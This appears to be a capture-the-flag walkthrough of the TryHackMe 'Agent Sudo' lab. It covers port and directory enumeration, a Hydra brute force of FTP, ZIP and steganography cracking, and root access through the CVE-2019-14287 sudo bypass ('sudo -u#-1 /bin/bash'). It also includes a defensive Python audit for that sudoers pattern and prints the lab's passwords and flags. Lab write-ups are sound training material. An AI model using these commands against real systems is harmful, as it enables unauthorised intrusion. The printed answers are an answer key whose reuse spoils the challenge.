Understanding Cybersecurity CTF: Agent Sudo
In this cybersecurity Capture The Flag (CTF) challenge, you are tasked with hacking into a secret server located under the deep sea. Your goal is to uncover the truth by following a series of steps involving enumeration, hash cracking, brute-force attacks, and privilege escalation.
Key Points
- Enumeration: Identify open ports and hidden directories.
- Hash Cracking and Brute-Force: Crack passwords for FTP, ZIP files, and SSH.
- Privilege Escalation: Exploit vulnerabilities to gain root access.
- Capture the Flag: Retrieve user and root flags.
Enumeration
Identifying Open Ports
Run an nmap scan to identify open ports:
nmap -sV -Pn -O -p- 10.10.209.115
Port | Service | Version |
---|---|---|
21 | ftp | vsftpd 3.0.3 |
22 | ssh | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 |
80 | http | Apache httpd 2.4.29 ((Ubuntu)) |
Answer: 3
Redirecting to a Secret Page
Use Gobuster to find hidden directories:
gobuster dir --url http://10.10.209.115 --wordlist /usr/share/wordlists/dirb/common.txt
Key directories found:
/.htpasswd
/.hta
/.htaccess
/index.php
/server-status
Visit http://10.10.209.115/index.php to see the message:
Dear agents,
Use your own codename as user-agent to access the site.
From, Agent R
Answer: user-agent
Discovering the Agent Name
Use a codename similar to Agent R as the user-agent. After some trial and error, the letter C is found:
curl -A "C" -L 10.10.209.115
Message received:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From, Agent R
Answer: chris
Hash Cracking and Brute-Force
FTP Password
Brute force the FTP password using Hydra:
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.209.115 ftp -I -V
Result:
[21][ftp] host: 10.10.209.115 login: chris password: crystal
Answer: crystal
ZIP File Password
Connect to the FTP server and download the files. Use binwalk to extract the ZIP file from a PNG, then use John the Ripper to crack the ZIP file password.
Answer: alien
Steg Password
Decode the base64 message QXJlYTUx:
echo "QXJlYTUx" | base64 --decode
Result: Area51
Answer: Area51
Identifying the Other Agent
Extract the message from cute-alien.jpg using steghide:
steghide extract -sf cute-alien.jpg
Message content:
Hi james,
Glad you find this message. Your login password is hackerrules!
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy, chris
Answer: james
SSH Password
Answer: hackerrules!
Capture the Flag
Connect via SSH:
ssh james@10.10.209.115
User Flag
Answer: b03d975e8c92a7c04146cfa7a5a313c7
Incident of the Photo
Search for Alien_autospy.jpg:
Answer: Roswell alien autopsy
Privilege Escalation
Check sudo permissions:
sudo -l
Result:
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
CVE Number for Escalation
Search for /bin/bash exploit cve:
Answer: CVE-2019-14287
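The sudo rule shown above allows every user ID except root, an exclusion that sudo releases before 1.8.28 fail to enforce (CVE-2019-14287). As an added example that is not part of the original write-up, this Python audit flags that Runas pattern in sudoers lines or `sudo -l` output. The function names, the version banners and the extra sample rules are constructed for illustration.

```python
import re

FIXED_IN = (1, 8, 28)  # CVE-2019-14287 was fixed in sudo 1.8.28

def sudo_version(banner):
    """Parse the first line of `sudo -V`, e.g. 'Sudo version 1.8.21p2'."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if m is None:
        raise ValueError("not a `sudo -V` banner: %r" % banner)
    return tuple(int(part) for part in m.groups())

def runas_excludes_root_only(runas):
    """True for a Runas user list that grants ALL and merely negates root."""
    users = [u.strip() for u in runas.split(":", 1)[0].split(",")]
    return "ALL" in users and any(u in ("!root", "!#0") for u in users)

def audit(rules_text, banner):
    """Return (line_no, rule, exploitable) for each rule using the pattern.

    Assumption: rules name users directly; Runas_Alias is not expanded.
    """
    vulnerable = sudo_version(banner) < FIXED_IN
    findings = []
    for no, line in enumerate(rules_text.splitlines(), 1):
        rule = line.strip()
        if rule.startswith("#"):  # commented-out rule or include directive
            continue
        for runas in re.findall(r"\(([^)]*)\)", rule):
            if runas_excludes_root_only(runas):
                findings.append((no, rule, vulnerable))
                break
    return findings

# `sudo -l` output as shown on this page, plus two constructed lines.
SAMPLE_RULES = """\
User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
    (www-data) /usr/bin/systemctl restart apache2
# chris ALL=(ALL, !root) /bin/sh
"""
SAMPLE_OLD = "Sudo version 1.8.21p2"  # constructed banner, older than the fix
SAMPLE_NEW = "Sudo version 1.8.31"    # constructed banner, includes the fix

if __name__ == "__main__":
    for banner in (SAMPLE_OLD, SAMPLE_NEW):
        for no, rule, exploitable in audit(SAMPLE_RULES, banner):
            state = "EXPLOITABLE" if exploitable else "patched, still a blocklist rule"
            print(f"{banner}: line {no}: {rule} -> {state}")
```

On a patched sudo the rule is still reported, because excluding root from ALL is a blocklist that is safer rewritten as an explicit list of permitted target users.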
Root Flag
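Use the exploit for CVE-2019-14287. Affected sudo versions resolve the user ID -1 to 0, so the command runs as root despite the !root exclusion: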
sudo -u#-1 /bin/bash
Retrieve the root flag:
cat /root/root.txt
Message:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is b53a02f55b57d4439e3341834d70c062
By, DesKel a.k.a Agent R
Answer: b53a02f55b57d4439e3341834d70c062
Bonus: Who is Agent R?
Answer: DesKel